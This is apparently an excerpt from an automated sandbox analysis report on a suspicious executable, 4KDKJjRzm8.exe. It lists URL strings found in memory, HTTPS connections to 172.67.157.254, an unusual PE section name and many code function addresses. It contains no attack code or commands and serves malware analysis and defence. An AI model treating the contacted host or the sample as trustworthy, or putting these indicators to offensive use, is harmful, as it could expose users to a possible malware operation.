                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1516290444.0000000005CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1515973644.0000000005D46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1515973644.0000000005D46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1515973644.0000000005D46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1515973644.0000000005D46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1515973644.0000000005D46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1515973644.0000000005D46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.9:49722 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.9:49728 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.9:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.9:49740 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.9:49746 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.9:49752 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.9:49761 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.9:49768 version: TLS 1.2

                System Summary

                barindex
                PE file contains section with special chars
                Source: 4KDKJjRzm8.exeStatic PE information: section name:
                Source: 4KDKJjRzm8.exeStatic PE information: section name: .idata
                Source: 4KDKJjRzm8.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009C04600_2_009C0460
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009BC5A00_2_009BC5A0
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_0098E6870_2_0098E687
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009886000_2_00988600
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_0099C8A00_2_0099C8A0
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009C0D200_2_009C0D20
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009B8EA00_2_009B8EA0
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_0098CE450_2_0098CE45
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_0098B1000_2_0098B100
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009B92800_2_009B9280
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009912270_2_00991227
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009AD34A0_2_009AD34A
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009A74400_2_009A7440
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009957C00_2_009957C0
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009A1D000_2_009A1D00
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009AC09E0_2_009AC09E
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A000B10_2_00A000B1
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A540B40_2_00A540B4
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A420BA0_2_00A420BA
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A0609C0_2_00A0609C
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A240EF0_2_00A240EF
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009AA0CA0_2_009AA0CA
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A6A0FE0_2_00A6A0FE
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009F60C20_2_009F60C2
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A1E0C00_2_00A1E0C0
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A560C10_2_00A560C1
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A800CD0_2_00A800CD
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AB60CE0_2_00AB60CE
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A740C10_2_00A740C1
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009F00F40_2_009F00F4
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A2C0CD0_2_00A2C0CD
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009960E90_2_009960E9
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009AC0E60_2_009AC0E6
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A8C02A0_2_00A8C02A
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AC40080_2_00AC4008
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A1C00B0_2_00A1C00B
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AA40180_2_00AA4018
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A920600_2_00A92060
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AD60790_2_00AD6079
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AA20470_2_00AA2047
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AE21A60_2_00AE21A6
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A601B50_2_00A601B5
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A261B40_2_00A261B4
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009AE1800_2_009AE180
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AD818F0_2_00AD818F
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A501810_2_00A50181
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00ADE1970_2_00ADE197
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A1E1EA0_2_00A1E1EA
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009A81CC0_2_009A81CC
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00ABC1FD0_2_00ABC1FD
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009FC1FE0_2_009FC1FE
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00ABA1C30_2_00ABA1C3
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A7E1270_2_00A7E127
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A281320_2_00A28132
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A6C1370_2_00A6C137
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A6E13C0_2_00A6E13C
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A5811F0_2_00A5811F
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A5A1650_2_00A5A165
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009AC09E0_2_009AC09E
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A0216A0_2_00A0216A
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A2E1420_2_00A2E142
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A6214B0_2_00A6214B
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009981690_2_00998169
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009861600_2_00986160
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A322A70_2_00A322A7
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A782AD0_2_00A782AD
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A1A2B10_2_00A1A2B1
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A9C2BA0_2_00A9C2BA
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AAA2BF0_2_00AAA2BF
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00ACE2BA0_2_00ACE2BA
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AA028F0_2_00AA028F
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009EA2AA0_2_009EA2AA
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009A42D00_2_009A42D0
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A202FC0_2_00A202FC
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A5C2270_2_00A5C227
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A0E2290_2_00A0E229
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00ABE2260_2_00ABE226
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A9A2340_2_00A9A234
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_0099E2200_2_0099E220
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A1826F0_2_00A1826F
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A142740_2_00A14274
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00ACC2720_2_00ACC272
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A4A2420_2_00A4A242
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A3E2440_2_00A3E244
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009842700_2_00984270
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A8E2440_2_00A8E244
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A462520_2_00A46252
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AC625B0_2_00AC625B
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A742580_2_00A74258
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A483A40_2_00A483A4
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AB83AB0_2_00AB83AB
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A5E3AB0_2_00A5E3AB
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A703A90_2_00A703A9
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A0C3800_2_00A0C380
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AAC39F0_2_00AAC39F
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AB239E0_2_00AB239E
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00ABC3900_2_00ABC390
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009A83D80_2_009A83D8
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009E83CF0_2_009E83CF
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A8C3F40_2_00A8C3F4
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A3A3FD0_2_00A3A3FD
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A7C3C40_2_00A7C3C4
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A3C3C40_2_00A3C3C4
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009E43F30_2_009E43F3
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A563D40_2_00A563D4
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AC432E0_2_00AC432E
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A763210_2_00A76321
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A223340_2_00A22334
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AA23080_2_00AA2308
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A5230F0_2_00A5230F
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00B3C31C0_2_00B3C31C
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A663140_2_00A66314
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AD43190_2_00AD4319
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00B4637A0_2_00B4637A
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009E63720_2_009E6372
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009EE3630_2_009EE363
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A863550_2_00A86355
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A2C4A00_2_00A2C4A0
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A1C4A40_2_00A1C4A4
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A344A90_2_00A344A9
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A204880_2_00A20488
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A6E4F60_2_00A6E4F6
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A2A4F50_2_00A2A4F5
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009A04C60_2_009A04C6
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009A24E00_2_009A24E0
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AD642D0_2_00AD642D
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00ADA40D0_2_00ADA40D
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00ADC4090_2_00ADC409
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A9040F0_2_00A9040F
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A384110_2_00A38411
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A984140_2_00A98414
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A064640_2_00A06464
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A1A4730_2_00A1A473
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A004750_2_00A00475
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009BA4400_2_009BA440
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A3647C0_2_00A3647C
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AE24410_2_00AE2441
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AB645B0_2_00AB645B
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AC24520_2_00AC2452
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A5C5AE0_2_00A5C5AE
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AB65BD0_2_00AB65BD
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009F85AC0_2_009F85AC
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A725920_2_00A72592
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A1E5E20_2_00A1E5E2
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A765EE0_2_00A765EE
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009BA5D40_2_009BA5D4
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A605F80_2_00A605F8
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A745F90_2_00A745F9
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A025C70_2_00A025C7
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009865F00_2_009865F0
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A825C00_2_00A825C0
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A465CD0_2_00A465CD
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A5E5CA0_2_00A5E5CA
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A945DB0_2_00A945DB
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AD45D70_2_00AD45D7
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A7052D0_2_00A7052D
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AAE5370_2_00AAE537
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009AC53C0_2_009AC53C
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009FC5330_2_009FC533
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009F45230_2_009F4523
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AC45750_2_00AC4575
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00ADE5770_2_00ADE577
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A625780_2_00A62578
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A0854A0_2_00A0854A
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A925440_2_00A92544
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009A45600_2_009A4560
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A1055B0_2_00A1055B
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A9A6A30_2_00A9A6A3
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A586A90_2_00A586A9
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A6E6B00_2_00A6E6B0
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A166B60_2_00A166B6
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A4C6B80_2_00A4C6B8
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AD26B00_2_00AD26B0
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A506BB0_2_00A506BB
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AD068E0_2_00AD068E
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AB06810_2_00AB0681
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009F26A20_2_009F26A2
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00ADE6EF0_2_00ADE6EF
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009A46D00_2_009A46D0
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AB26C80_2_00AB26C8
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A966C10_2_00A966C1
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A1C6CB0_2_00A1C6CB
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009C06F00_2_009C06F0
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A8E6D80_2_00A8E6D8
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A046DB0_2_00A046DB
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A0E6210_2_00A0E621
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A2C62B0_2_00A2C62B
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_0099E6300_2_0099E630
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AC66060_2_00AC6606
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A786110_2_00A78611
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A126630_2_00A12663
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A8A66C0_2_00A8A66C
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009B86500_2_009B8650
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A146760_2_00A14676
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A266480_2_00A26648
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A807B50_2_00A807B5
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A3A7830_2_00A3A783
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A087820_2_00A08782
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A0E79F0_2_00A0E79F
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A1C7E40_2_00A1C7E4
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AA87F70_2_00AA87F7
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A447C40_2_00A447C4
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A367C60_2_00A367C6
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A9E7C20_2_00A9E7C2
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00ADC7C60_2_00ADC7C6
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A3C7D10_2_00A3C7D1
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AA27280_2_00AA2728
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009FE7050_2_009FE705
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A9C7360_2_00A9C736
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A9870B0_2_00A9870B
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AC87040_2_00AC8704
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A4870E0_2_00A4870E
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A307100_2_00A30710
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A467670_2_00A46767
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009927500_2_00992750
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009F07530_2_009F0753
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A647760_2_00A64776
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009F674E0_2_009F674E
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009F87490_2_009F8749
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A0C7440_2_00A0C744
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AAC74C0_2_00AAC74C
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A247500_2_00A24750
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A8C7520_2_00A8C752
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AA67570_2_00AA6757
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00A6A8AF0_2_00A6A8AF
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009B88B00_2_009B88B0
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00B4E8D00_2_00B4E8D0
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_00AAE8C10_2_00AAE8C1
